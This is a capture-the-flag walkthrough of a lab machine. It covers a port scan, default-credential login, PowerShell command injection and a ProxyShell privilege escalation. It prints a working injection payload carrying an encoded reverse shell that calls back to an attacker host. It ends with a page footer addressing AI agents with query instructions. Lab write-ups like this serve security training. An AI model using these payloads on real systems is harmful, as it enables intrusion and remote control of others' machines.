# Lookback
First, let's run an `nmap` scan:
So we have 3 open ports. One HTTP server, one HTTPS server, and one MS-terminal server.
Let's scan the HTTPS server first:
Lots of `Status: 302` , which means a redirect, but there's one noticable `status 401` (unauthorized): "/test".\
Let's see what's on that page.
There's a simple HTTP-auth blocking our way. Let's try some default credentials like `admin:admin`:
It worked.\
We are brought to a webpage wth a "log analyzer", and the first flag.
Let's see what happens when we press the "run" button:
It seems to output the content of a file.\
This is very vulnerable, because we can specify what file it outputs. Let's see what happens when we enter nothing:
As you can see, the command being ran is
```
Get-Content('C:\$INPUT')
```
This is easily exploitable, by manipulating the input. \
We can end the command and chan another using `');` .\
Because there is still a trailing `')`, we need to terminate it for our payload to run, so we add another `('`.
The final payload (using [revshells.com](https://www.revshells.com/)) looks like this:
```
'); $PAYLOAD; (' // The template
');powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADEALgAxADYANwAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=;('
```
Before we press the "Run" button, we open a `netcat` listener:\
Then we press the "Run" button, and we get a shell back:
### Privelege escalation
After looking around the system a bit, we found an important text file, and the second flag:
We find three e-mail addresses:
```
dev-infrastracture-team@thm.local
carol@thm.local
joe@thm.local
```
The line that stands out is: "`Install the security update for MS Exchange`".\
So we need to find an MS exchange vulnerability.
Let's check the verion of MS exchange using `GCM exsetup |%{$_.Fileversioninfo}` :
After a bit of googling we find the "ProxyShell" exploit, which we can use on Metasploit, using the Email address we found before:
{% hint style="info" %}
Make sure your LPORT isn't in use by netcat, otherwise the exploit will not work.
{% endhint %}
And we have a shell as the Root user, which we get the third flag with:
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://eduw.gitbook.io/writeups/lookback.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.